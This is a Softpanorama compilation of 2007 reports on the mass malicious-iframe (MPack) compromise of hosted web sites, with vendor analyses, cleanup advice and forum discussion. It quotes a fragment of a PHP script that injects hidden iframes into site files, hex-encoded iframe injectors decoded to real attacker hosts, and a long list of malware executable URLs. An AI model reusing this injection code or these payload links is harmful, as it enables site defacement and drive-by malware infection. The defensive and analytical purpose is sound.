Softpanorama
May the source be with you, but remember the KISS principle ;-)

Contents Bulletin Scripting in shell and Perl Network troubleshooting History Humor

Malicious iframe attack

News See also Recommended Links Recommended Books Recommended Papers Web Server Security Zombies
Cheap Web hosting with SSH access Spyware fighting strategy Identity theft Adding sites to the hosts file Phishing Cheap Web hosting with SSH access

 Etc

In July 2007 there was a new massive hacking attack on web sites. This attack targeted primarily budget Webhosting providers but it was not limited to them. For example several site from HBS were compromised too. SANS has another List Of Compromised Sites

It looks like the attack usually has two stages.

This attack stresses the fact that Web browsers should now be installed on VM and used with a special disposable image of Windows.  Please consider using Microsoft Virtual PC or VMware and opening a separate instance of OS for browsing if you did not do it already.

Account passwords harvesting

The best description of the first phase that I found is from  Hosting Reviews at Hostjury.com - Blog  and is related to Dreamhost. In no way you should consider that Dreamhost was alone. They were just  more open about it and I would give they high credits. Most other providers affected tried to swipe the dirt under the carpet.

According to an e-mail sent out to many Dreamhost clientele earlier today there have been over 3,500+ hosting accounts exploited at Dreamhost.

The suspected entry point into the accounts was most likely password sniffing however there are many other rumors surrounding the event.

This exploit quickly followed a recent exploit of IPowerWeb that resulted in the defacement of over 35% of the IPowerWeb clientbase. Earlier this year exploits affected Hostgator & many other large providers whose systems were rooted.

A copy of the e-mail sent out by the dreamhost team is below:

From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your ‘XXXX’ FTP account.

We have detected what appears to be the exploit of a number of accounts belonging to DreamHost customers, and it appears that your account was one of those affected.

We’re still working to determine how this occurred, but it appears that a 3rd party found a way to obtain the password information associated with approximately 3,500 separate FTP accounts and has used that information to append data to the index files of customer sites using automated scripts (primarily for search engine optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed - less than 0.15% of the total accounts that we host - actually had any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

Again, only about 20% of the exploited accounts showed any modifications, and of those the only known changes have been to site index documents (ie. ‘index.php’, ‘index.html’, etc - though we recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct access to our internal customer information database, but this was thwarted by protections we have in place to prevent such access. Similarly, we have seen no indication that the intruder accessed other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-scenes changes to improve internal security, including the discovery and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this particular security breach and keep customers apprised of what we find. Once we learn more, we will be sure to post updates as they become available to our status weblog: http://www.dreamhoststatus.com/

Thank you for your patience. If you have any questions or concerns, please let us know.

Mass modification of site files

On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK,  to install malicious IFrames. Usually only main site index documents were targeted (ie. index.php, index.html,  index.shtml,  etc.). Malicious IFrames are usually installed at the beginning or at the end of the document. That might be because of different tools of different version/modes of work of MPACK.  But there are other cases when all documents were modified by replacing <body> tag [SANS Internet Storm Center] :

After checking were the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.

One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.

Two things were obvious here:

Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:

  for ($i = 3; $i < 500; $i++) {
      if ($i == 438) continue;
      flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
      iframe_account(array('/home/sites/site' . $i . '/web'));
  }

From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().

This function takes every director and performs a recursive search for 4 file types:

  $file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “</body>” tag which is replaced with the malicious iframe and properly closed:

  $iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);

And voila – a mass compromise happened.

Here is how .Symantec Security Response Weblog  describes the tool:

You always thought that by staying clear of the dark alleys of the Internet and visiting only “reputable” websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits.

As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.

The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.

This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows for the iframe to be injected at the top or bottom of the page and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return-on-investment, the tool can check the Google PageRank for the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.

To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors’ iframes injected in the page. And of course, extensive logs and statistics are provided.

This tool itself however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator’s credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with latest patches as well as your anti-virus program.

Posted by Amado Hidalgo on June 19, 2007 11:39 AM

The actual exploit is an encoded IFRAME pointing to the web site with malware.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

Pages in hacked web sites are modified using IFRAME to connect to one of many "seed sites" which run scripts that either:

Recommended webmaster reaction to the exploit

  1. Save hacked index page for further analysys and restore the page from the archive. If you do not have an archive located the fragment in the index page and delete (see below on how to do that).
  2. Change your FTP account password. Most probably it was compromised.
  3. If possible reconfigure your FTP account to accept connections only from the IP range that you use (in case you use DHCP it can be IP range of your ISP).
  4. If possible block access to sites which provides WEB services for the exploit (see below hos to dermine them out of the encoded string in the exploit
  5. Search your webpages using grep for strings like "document.write(unescape("
    or other notable string that you can detect on the affected page, for example:
    <script type="text/javascript">
    <!--
    document.write(unescape('%3C%69%66%...'));
    //-->
    </script>

    That will give some assurance that this exploit was used only on index document of your WEB site. and was not replicated on other pages.

  6. Install a cron script that periodically searches your Web pages for the string typical for the exploit used ("document.write(unescape(" in the case above), sends you email if found and restore the file(s) in quiestion from the backup.
     
  7. Check if you ISP uses the latest version of Apache with security fixes. You can check this using telnet

    telnet www.mysite.com 80
    12:12
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>501 Method
    Not Implemented</TITLE>
    </HEAD><BODY>
    <H1>Method Not Implemented</H1>
    ♥ to /index.h
    tml not supported.<P>
    Invalid method in request \x03<P>
    <HR>
    <ADDRESS>
    Apache/1.3.33
    Server at myhost.myisp.com Port 80</ADDRESS>
    </BODY></HTML>

    Connection to host lost.
    Here you can see that the version of web server is old.  that does not necessary means that it is vulnerable but still is this of some concern (the latest is 1.3.37).

  8. If you have custom scripts it might be prudent to analyze their security.

Decoding the IFRAME content and determining the site with malicious content

The encoded fragment that you have found can be decoded via many sites. For example you can use HTML & JavaScript Encoder-Decoder In the case of an exploit listed above the actual code is as following:

<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>

That means that you need to block 203.121.73.33  to increase the chances of avoiding infecting users in case of reinfection. 

Recommendations for ISPs

ISPs which do not provide users with shell access, might be hurt if such attacks became recurrent as this is in essence an attack on the business model of cheap, reliable hosting when part of reliability is achieved by not providing ssh access to users.

 I would propose several steps that can compensate for the lack of shell access:
  1. It is unclear how they harvest password and to find the answer to this question is of paramount importance. If user password are stored in clear, you should consider adopting an encoding scheme.
  2. One of the problems is weakness of VDECK as software for those ISPs which use it (I have no experience with Cpanel). 
  3. Provide users with several "precooked" cron scripts
  4. It look like the attack target Apache so there might be a need to revise and improve the Apache configuration to make more resistant to attacks. As Sophos mentions in its blog entry Mal-ObfJS-C Where When

    Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry <http://www.sophos.com/security/blog/2007/06/250.html> Friday.

    That might be just a side effect of the fact that this attack targeted budget ISPs.

Top updates

Softpanorama Switchboard
Softpanorama Search

NEWS CONTENTS

Old News ;-)

[Aug 11, 2010] Zombies with php files scanners installed of the day ;-)

109.86.145.204
64.34.172.171 xeoline.com
70.86.235.162 ns5.btis.co.za
77.246.248.221 ns3.h20.ru

[Jul 31, 2010] Top zombies with php files scanners installed for July 2010

85.255.199.38 hosted.by.hostbasket.com
93.187.141.50 93-187-141-50.profisol.ro
205.251.131.33 s10077.iwsservers.com
213.180.89.75 shwl-0002.s.ipeer.se
83.143.81.162
83.143.81.162 shwl-0002.s.ipeer.se
188.165.217.175 ns211908.ovh.net
217.113.61.155 www.yofej.hu
211.233.11.170
211.233.11.170 www.yofej.hu
72.249.108.140 willow.e3linux.com
95.168.174.31 ns2.safronov.biz
77.79.245.90 p25.progreso.pl
24.173.234.213 rrcs-24-173-234-213.sw.biz.rr.com
219.240.36.36: Non-existent domain
219.240.36.36 rrcs-24-173-234-213.sw.biz.rr.com
195.130.205.27 europrojects.org
216.14.125.163 server.yeshuasharvest.org
180.151.249.166

[ Jun 28, 2007] Mal-ObfJS-C Where When

"... the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix."

22 June 2007 11:42 GMT

For the past 7 weeks SophosLabs have been tracking an attack targeting sites all over the world. In the attack, legitimate sites have been compromised so that they serve up a malicious JavaScript (Mal/ObfJS-C). In this post, I present a brief summary of the data obtained thus far.

Since May 1st, we have found 3,896 URLs that have been compromised, over 1,627 different domains. The subject matter of the hacked sites covers as wide a range of topics as you can imagine. Clothes boutiques, driving instruction, nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical instruments. Most worryingly, there are some fairly popular sites within the list, including a fairly large bank (this site was hacked last week). Taking a deeper look at the data, we can gather further information about this campaign.

As you can see from the following graph (note the log scale on the y-axis), the vast bulk of the compromised pages are being served up from sites in the United States, closely followed by Brazil, Canada and the UK.

Countries hosting Mal/ObfJS-C

It should be noted this data is based on the country in which the host web server resides - it does not indicate the locale of the site itself. For example, several ‘.co.uk’ domains were found to be hosted within the US.

To get a true impression of the scale of such an attack, looking at domain names alone is insufficient. We have encountered previous cases where initial data based on a plethora of compromised domains has suggested a large campaign, only to find that they all were as the result of the hacking of a handful of boxes within a single service provider (Troj/EncIfr-A for example). Looking at this data from an IP perspective reveals 324 unique IP addresses, the bulk of which are hosting a low number of compromised sites.

Number of compromised domains per server IP

As might be expected, we can see that in several cases, once the hackers have managed to hack a server, they have compromised several sites hosted there.

Probing further, we can try to identify the operating system and web server application. As you can see below, the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix.

Web server types hosting Mal/ObfJS-C

Though we cannot deduce the method employed by the hackers to compromise the servers, such data is nonetheless interesting. Gathering and analysis of such data provides us with valuable information to assist in the fight against web attacks. As ever, it is imperative that web servers are maintained and patched to the latest level. If you outsource the responsibility of this to your ISP, ensure they follow good practice. Remember, their failure could lead to your loss of credibility if it is your site that gets hacked into a malicious drive-by.

Fraser, SophosLabs UK

script added to my site (not by me)

Typical reaction after discovery of the imbedded iframe.

<pre>
Could someone help me out and tell me what this is:
<html>
<body>
<script>
document.write(unescape("%3c..."));
</script>
</body>
</html>
</pre>

Strange mix-up in Thunderbird - mozilla.support.thunderbird Google Groups

Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.

>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.

> either an extensions is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.

Thanks for your reply, but add-ons are certainly not the cause.

Could this exploit code from a malware site affect Firefox - mozilla.support.firefox Google Groups

span class="fontsize0 " id="prof" style="DISPLAY: none">View profile "OMA" <omol...@inicia.es> wrote in news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org: > I'd like to know if that code could exploit any vulnerability > in Firefox, and thus if it may have affected my system. .

No. In IE, clicking on the executable would run it. In FF, you can only download an executable file, then you have to browse to the saved file and click it yourself, manually. -- Mozilla & Netscape FAQs: http://www.ufaq.org/ Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/ Web page validation: http://validator.w3.org

About Mozilla: http://www.mozilla.org Ambition is a poor excuse for not having the good sense to be lazy. Jun 24, 11:00 pm

Newsgroups: mozilla.support.firefoxFrom: Chris Jahn <clj...@netscape.net.invalid>

Date: Sun, 24 Jun 2007 22:00:23 -0500

Local: Sun, Jun 24 2007 11:00 pm

Subject: Re: Could this exploit code from a malware site affect Firefox?

"OMA" <omol...@inicia.es> wrote in
news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org:

> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.

No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.

--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org

Ambition is a poor excuse for not having the good sense to be
lazy.

Reply to author Forward Aggro More options Jun 25, 10:48 am Newsgroups: mozilla.support.firefox

From: Aggro <spammerdr...@yahoo.com>

Date: Mon, 25 Jun 2007 17:48:44 +0300

Local: Mon, Jun 25 2007 10:48 am

Subject: Re: Could this exploit code from a malware site affect Firefox?

Reply | Reply to author | Forward | Print | Individual message | Show original | Report this message | Find messages by this author

OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.

There seems to be a large loop. That probably caused your browser to
froze. Frozing is not an indication that they managed to do something to
your computer.

It looks like "Internet Explorer createControlRange Object Buffer Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html

So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.

--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29

CastleCops® omega-it.ru

WOW this is ALL from omega-it.ru, Wow I feel sorry for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and bankers and a few sdbots. wow jsut from one computer network
http://www.lovemoney88.com/mm/1.exe
http://www.lovemoney88.com/mm/2.exe
http://www.lovemoney88.com/mm/3.exe
http://www.lovemoney88.com/mm/4.exe
http://www.lovemoney88.com/mm/5.exe
http://www.lovemoney88.com/mm/6.exe
http://www.lovemoney88.com/mm/7.exe
http://www.lovemoney88.com/mm/8.exe
http://www.lovemoney88.com/mm/9.exe
http://www.lovemoney88.com/mm/10.exe
http://www.lovemoney88.com/top/top.exe
http://soft.trustincash.com/loader/exe/ticads.exe
http://soft.trustincash.com/loader/exe/tse.exe
http://soft.trustincash.com/loader/exe/b2.exe
http://soft.trustincash.com/loader/exe/u.exe
http://81.29.241.195/part/joke.exe
http://megafastsuperhost.net/loader.exe
http://tyt-menia.net/s32.exe
http://ddl-help.info/readme.exe
http://execucom.co.uk/img/load.exe
http://www.laydy.net/file.exe
http://laydy.net/1/1.exe
http://laydy.net/2/2.exe
http://www.norton-nod32.com/trf/sp_6/file1.exe
http://www.norton-av2007.com/trf/tools/calc.exe
http://www.smalltool.net/new.exe
http://serv263.info/rss/demo.exe
http://a-commando.info/zupastik.exe
http://bahep.info/file.exe
http://coco32.org/o/exp/r/install1.exe
http://208.64.26.150/spm/loader.exe
http://208.64.26.150/spm/2loader.exe
http://208.64.26.150/test1.exe
http://208.64.26.150/spm/4loader.exe
http://205.209.179.15/aff/dir/cent.exe
http://205.209.179.15/aff/dir/pdp.exe
http://70.47.53.19/~soft/bin/iexplore.exe
http://81.95.146.206/windar.exe
http://72.29.67.138/vx0125b.exe
http://70.47.53.19/~soft/bin/ieschedule.exe
http://spywaresoftstop.com/download/sss_setup.exe
http://serv263.info/st.exe
http://laydy.net/3/3.exe
http://laydy.net/4/4.exe
http://laydy.net/5/5.exe
http://81.95.149.235/asm/file.exe
http://coco32.org/tn/axt.exe
http://www.coco32.org/clients/lx001.exe
http://www.coco32.org/clients/137-15.exe
http://s1.rollsystems.info/files/bild.exe
http://coco32.org/tn/axt.exe
http://allddos.biz/sp//b.exe
http://allddos.biz/sp//p.exe
http://hostbiz.info/fgh.exe
http://huyamilka.com/adv/190/win32.exe
http://58.65.232.10/mrkg/l1.exe
http://58.65.232.10/mrkg/l2.exe
http://www.moneyboomtown.com/images/realfoto.exe
http://qazxcdew.by.ru/file.exe
http://miramax-invest.net/ivan/load.exe
http://wert-co.ru/1.exe
http://fotballportal.info/kill/1.exe
http://thekurt.info/load.exe
http://stat1count.net/adv/014/win32.exe
http://bfstats.info/img/avatars/s/123.exe
http://cards.funnystories.ru/adv007.exe
http://cards.funnystories.ru/bot.exe
http://cards.funnystories.ru/img/adv7.exe
http://sun-ww.net/bG9hZGVy/c25hdGNo.exe
http://wow02.w125.west263.cn/mtv/ook.exe
http://baserionkerjans.com/dlksr32.exe
http://baserionkerjans.com/m.2.16.exe
http://baserionkerjans.com/sysmwbt.exe
http://baserionkerjans.com/asr.exe
http://baserionkerjans.com/crslc.exe
http://baserionkerjans.com/KB070517sk.exe
http://baserionkerjans.com/fdd32.exe
http://slil.ru/24353191/919567585/Instal.exe
http://xuyhadesunkadwi.com/fdd32.exe
http://xuyhadesunkadwi.com/asr.exe
http://xuyhadesunkadwi.com/KB070517sk.exe
http://xuyhadesunkadwi.com/c.8.0.exe
http://xuyhadesunkadwi.com/m.2.16.exe
http://xuyhadesunkadwi.com/crslc.exe
http://xuyhadesunkadwi.com/sysmwbt.exe
http://xuyhadesunkadwi.com/dlksr32.exe
http://yuvideo.org/UD2.exe
http://counter-forever.cn/sp_pack/counter/Dropper.exe
http://81.95.148.188/20509.exe
http://zjabutkcjdctv.biz/d1.exe
http://zjabutkcjdctv.biz/d2.exe
http://zjabutkcjdctv.biz/d3.exe
http://www.skytrip.org/p/p.exe
http://216.255.180.6/2497.exe
http://hack-off.info/sb/sferhtemp.exe
http://81.95.149.235/cmddd/216.exe
http://81.95.149.235/cmddd/mail.exe
http://75.126.226.224/aff/dir/alt.exe
http://75.126.226.224/aff/dir/pee.exe
http://inspekt.biz/update.exe
http://inspekt.biz/svchostes.exe
http://ak.ipv1.info/s3.0.exe
http://falop5fas.com/0.exe
http://boln7be8.com/0.exe
http://nower5re9.com/0.exe
http://a-commando.info/ll.exe
http://75.126.21.162/aff/dir/sams.exe
http://zjabutkcjdctv.biz/d4.exe
http://agressor.info/hello.exe
http://hertunjinkdesinl.com/rs34sk.exe
http://hertunjinkdesinl.com/gdf32.exe
http://baserionkerjans.com/gdf32.exe
http://baserionkerjans.com/rs34sk.exe
http://baserionkerjans.com/mdt.exe
http://hertunjinkdesinl.com/dlksr32.exe
http://hertunjinkdesinl.com/m.2.16.exe
http://hertunjinkdesinl.com/sysmwbt.exe
http://hertunjinkdesinl.com/asr.exe
http://hertunjinkdesinl.com/mdt.exe
http://hertunjinkdesinl.com/crslc.exe
http://hertunjinkdesinl.com/KB070517sk.exe
http://hertunjinkdesinl.com/fdd32.exe
http://hertunjinkdesinl.com/c.8.0.exe
http://xuyhadesunkadwi.com/gdf32.exe
http://xuyhadesunkadwi.com/rs34sk.exe
http://xuyhadesunkadwi.com/mdt.exe
http://81.95.149.235/cmddd/215.exe
http://www.ctv163.com/admin/qq.exe
http://baserionkerjans.com/csrcss.exe
http://hertunjinkdesinl.com/csrcss.exe
http://xuyhadesunkadwi.com/csrcss.exe
http://falop5fas.com/1.exe
http://boln7be8.com/1.exe
http://nower5re9.com/1.exe
http://opaga.com/d/f/system.exe
http://www.tbporno.com/soft/tbporno_2.58.exe
http://xuyhadesunkadwi.com/svchcc32.exe
http://baserionkerjans.com/svchcc32.exe
http://hertunjinkdesinl.com/svchcc32.exe
http://81.176.20.4/1.exe
http://216.255.189.214/aff/dir/sony.exe
http://66.148.74.35/aff/dir/sony.exe
http://66.148.74.7/aff/dir/sony.exe
http://66.148.74.35/aff/dir/pdp.exe
http://85.249.23.43/1.exe
http://teryunkasewion.com/skl32.exe
http://2005-search.com/go.exe
http://www.ctv163.com/heixia/q.exe
http://72.20.4.126/dload.exe
http://72.20.4.126/5.exe
http://a-commando.info/zzz.exe
http://www.lightsgb.net/inst.exe
http://www.newoldway.info/winhp32cln.exe
http://81.95.149.235/loads/load2.exe

The new malware ecology

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear - it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install - Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

Netcraft IFRAME Exploit Spreading Through Banner Ads

Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag.

"Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.

Site operators are being cautioned to verify that the banners do not contain the IFRAME exploit code, or failing that, temporarily disable banner ads to minimize the risk of accidentally infecting users and propagating the exploit. The ISC did not identify any of the affected sites.

Users clicking on the banners are being infected with variants of the Bofra worm that has been proporagating through e-mail and malicious web sites. Bofra appeared just days after the revelation of the IFRAME vulnerability, which affects Internet Explorer 6 on all Windows platforms except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers to gain complete control of a user's computer.

How can I protect against malicious iFrames - CNET Viruses & security alerts Forums

on-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.asp

But the best you could do:
For home users:
* Beware of pages that require software installation. Do not allow new software installation from your browser unless you absolutely trust both the Web page and the provider of the software.
* Scan with an updated antivirus and anti-spyware software any program downloaded through the Internet. This includes any downloads from P2P networks, through the Web and any FTP server regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never open attachments or click on links contained in these email messages.
* Enable the “Automatic Update” feature in your Windows operating system and apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html

Computerworld - Porn sites serve up Mpack attacks

Several hundred pornography sites are surprising unwitting users with a smorgasbord of exploits via Mpack, the already notorious hacker toolkit that launched massive attacks earlier this week from a network of more than 10,000 compromised domains.

Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous content -- that have either been hacked or are purposefully redirecting users to servers hosting Mpack, a professional, Russian-made collection of exploits that comes complete with a management console.

Even though there are far fewer porn sites in this newly discovered infection chain than in Monday's "Italian Job" attack -- called that because most of the 10,000+ hijacked sites were legitimate Italian domains -- they've managed to infect twice as many end-users' PCs, said Trend Micro in a posting to its malware blog.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

"The MPack gang appears to be using an IFRAME manager tool to automate the task on a large scale," said Amado Hidalgo, a Symantec security analyst. The tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end database, regularly checks a large list of sites to inject the malicious IFRAME code.

Hidalgo also spelled out how hackers have been getting into legitimate sites, which puzzled investigators earlier this week. "It takes as input a list of Web site administrator accounts, possibly obtained in the black market," he said. Those administrator accounts are recorded in MySQL, and the manager can be left running so that it re-infects sites that have been purged of the IFRAMES code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The site administrator's credentials need to be changed."

Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry Friday. That's not always the case, said Ron O'Brien, senior security analyst at Sophos. "Overall, hacked sites are about evenly split between Apache and [Microsoft] IIS servers, but in this subset it's almost entirely Apache." Another interesting factoid, said O'Brien: "Of all the sites we've tracked that serve malicious code, about 80 percent have been hacked."

